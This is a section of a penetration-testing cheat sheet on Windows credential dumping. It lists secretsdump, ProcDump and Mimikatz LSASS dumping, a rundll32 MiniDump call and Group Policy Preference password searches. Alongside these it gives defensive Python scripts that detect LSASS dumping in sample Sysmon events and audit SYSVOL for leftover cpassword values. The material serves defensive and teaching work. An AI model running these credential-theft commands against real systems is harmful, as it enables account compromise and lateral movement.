Privilege Escalation

SecretsDump
Description: Dump hashed credentials from SAM or LSASS on a domain controller or host.
Tools/Commands:
  Impacket:
    secretsdump.py <DOMAIN>/<USER>@<IP>
  CrackMapExec:
    crackmapexec smb <IP> -u <USER> -p <PASS> --sam
  psexec.py <DOMAIN>/<USER>@<IP>

LSASS Dumping
Description: Extract credentials from LSASS process memory.
Tools/Commands:
  ProcDump:
    procdump.exe -ma lsass.exe lsass.dmp
  Mimikatz:
    sekurlsa::minidump lsass.dmp
  rundll32.exe C:\path\to\procdump.dll,MiniDump <lsass_pid>
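Every command in this section either launches a dump utility with lsass.exe on its command line or opens a handle to lsass.exe memory, and both leave telemetry a defender can key on. The Python script below is an added example, not code from this page or from any of the tools listed: it runs two detections over constructed Sysmon-style records, a command-line pattern match on Event ID 1 (process creation) and a PROCESS_VM_READ check on Event ID 10 (ProcessAccess) where the target is lsass.exe. The field names (Image, CommandLine, SourceImage, TargetImage, GrantedAccess) follow Sysmon's schema; the record layout, the allowlist of trusted source images and the sample events are assumptions constructed for the demo and would be tuned per environment.

```python
"""Detect LSASS memory-dump activity in constructed Sysmon-style event records.

Added example: the record layout, allowlist and SAMPLE_EVENTS are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass

# PROCESS_VM_READ (0x0010): any tool that reads another process's memory needs this right.
PROCESS_VM_READ = 0x0010

# Command-line patterns for the dump tooling listed on this page. Case-insensitive.
CMDLINE_RULES = [
    ("procdump_lsass", re.compile(r"procdump(?:64)?(?:\.exe)?\s+.*-ma\s+lsass", re.I)),
    ("rundll32_minidump", re.compile(r"rundll32(?:\.exe)?\s+.*,\s*minidump\b", re.I)),
]

# Source images that legitimately hold lsass handles (constructed allowlist; tune per host build).
ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}


@dataclass
class Alert:
    rule: str
    record_id: int
    detail: str


def check_process_create(rec):
    """Sysmon Event ID 1: match CommandLine against the known dump-tool patterns."""
    cmd = rec.get("CommandLine", "")
    return [Alert(name, rec["RecordId"], cmd) for name, pat in CMDLINE_RULES if pat.search(cmd)]


def check_process_access(rec):
    """Sysmon Event ID 10: flag a handle to lsass.exe whose GrantedAccess includes
    PROCESS_VM_READ and whose SourceImage is not on the allowlist."""
    target = rec.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return []
    source = rec.get("SourceImage", "").lower()
    if source in ALLOWLIST:
        return []
    granted = int(rec.get("GrantedAccess", "0x0"), 16)
    if granted & PROCESS_VM_READ:
        return [Alert("lsass_vm_read", rec["RecordId"], f"{source} GrantedAccess={hex(granted)}")]
    return []


def scan(records):
    """Run the per-event-type checks over a list of records and return all alerts in order."""
    alerts = []
    for rec in records:
        if rec["EventId"] == 1:
            alerts.extend(check_process_create(rec))
        elif rec["EventId"] == 10:
            alerts.extend(check_process_access(rec))
    return alerts


# Constructed sample events (not real telemetry). PIDs and paths are placeholders.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventId": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"RecordId": 2, "EventId": 1, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": "procdump.exe -ma lsass.exe lsass.dmp"},
    {"RecordId": 3, "EventId": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\path\to\procdump.dll,MiniDump 624"},
    # Allowlisted system process: no alert even though it touches lsass.
    {"RecordId": 4, "EventId": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    # Full access from an unknown tool: PROCESS_VM_READ bit set, alert.
    {"RecordId": 5, "EventId": 10, "SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    # Query-only access (no VM_READ bit): no alert.
    {"RecordId": 6, "EventId": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.rule}] record {a.record_id}: {a.detail}")
```

The ProcessAccess check is the more durable of the two: a renamed binary defeats the command-line rule, but the handle it opens on lsass.exe still has to carry PROCESS_VM_READ, so the allowlist of legitimate source images is where the tuning effort belongs.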
GPP Passwords
Description: Extract plaintext passwords stored in Group Policy Preferences files.
Tools/Commands:
  PowerShell:
    Get-ChildItem \\<DC>\SYSVOL -Recurse | Select-String -Pattern "password"
  Metasploit:
    post/windows/gather/credentials/gpp
  Manual search: Look for files with .xml extensions containing <cpassword> tags.
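The defensive counterpart of that manual search is a recurring audit of SYSVOL that finds every preference file still carrying a cpassword so it can be removed. The Python script below is an added example, not code from this page or from Microsoft's own remediation tooling: it builds a throwaway directory shaped like SYSVOL/Policies/<GUID>/..., walks it, and reports every .xml file whose cpassword attribute or element is non-empty, without decrypting anything. The folder names, GUID placeholders and file contents are constructed for the demo; a real run would point audit_sysvol at the domain's SYSVOL share.

```python
"""Audit a SYSVOL-like tree for Group Policy Preference XML files that still carry a cpassword.

Added example: the layout, GUID placeholders and file contents below are constructed.
"""
import os
import re
import shutil
import tempfile
import xml.etree.ElementTree as ET

CPASSWORD_ATTR_RE = re.compile(r'cpassword\s*=\s*"([^"]*)"', re.I)


def find_cpassword(path):
    """Return the non-empty cpassword values in one XML file.

    Handles the attribute form (<Properties cpassword="..."/>) and an element form
    (<cpassword>...</cpassword>). Values are reported as-is and never decrypted."""
    try:
        tree = ET.parse(path)
    except ET.ParseError:
        # A malformed file must not be skipped silently: fall back to a text match.
        with open(path, encoding="utf-8", errors="replace") as fh:
            return [v for v in CPASSWORD_ATTR_RE.findall(fh.read()) if v]
    found = []
    for elem in tree.iter():
        for attr, value in elem.attrib.items():
            if attr.lower() == "cpassword" and value:
                found.append(value)
        if elem.tag.lower() == "cpassword" and (elem.text or "").strip():
            found.append(elem.text.strip())
    return found


def audit_sysvol(root):
    """Walk root and return sorted (relative_path, hit_count) pairs for every .xml file
    with at least one non-empty cpassword."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".xml"):
                continue
            full = os.path.join(dirpath, name)
            hits = find_cpassword(full)
            if hits:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, len(hits)))
    return sorted(findings)


# Constructed sample files. The cpassword strings are dummies, not real ciphertext.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin">
    <Properties action="U" userName="localadmin"
                cpassword="CONSTRUCTED_DUMMY_VALUE_1" changeLogon="0"/>
  </User>
</Groups>
"""
# Already remediated: the attribute is present but empty, so it must not be reported.
SAMPLE_CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin"><Properties action="U" cpassword="" userName="localadmin"/></User>
</Groups>
"""
# Truncated on purpose (no closing </Drives>) to exercise the ParseError fallback.
SAMPLE_MALFORMED_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives><Drive name="H:"><Properties cpassword="CONSTRUCTED_DUMMY_VALUE_2" userName="svc"/></Drive>
"""


def build_sample_tree():
    """Create a throwaway tree shaped like SYSVOL/Policies/<GUID>/... and return its root."""
    root = tempfile.mkdtemp(prefix="sysvol_audit_")
    layout = {
        "Policies/{POLICY-GUID-1}/Machine/Preferences/Groups/Groups.xml": SAMPLE_GROUPS_XML,
        "Policies/{POLICY-GUID-1}/GPT.INI": "[General]\nVersion=1\n",
        "Policies/{POLICY-GUID-2}/User/Preferences/Groups/Groups.xml": SAMPLE_CLEAN_XML,
        "Policies/{POLICY-GUID-2}/Machine/Preferences/Drives/Drives.xml": SAMPLE_MALFORMED_XML,
    }
    for rel, content in layout.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sysvol = build_sample_tree()
    try:
        for rel, count in audit_sysvol(sysvol):
            print(f"REMEDIATE: {rel} ({count} cpassword value(s))")
    finally:
        shutil.rmtree(sysvol)
```

The audit deliberately matches on the cpassword name rather than on "password", so ordinary policy text does not produce noise, and it treats an unparseable file as a finding candidate rather than an exception, since a half-written or corrupted preference file is exactly the kind that escapes a one-off cleanup.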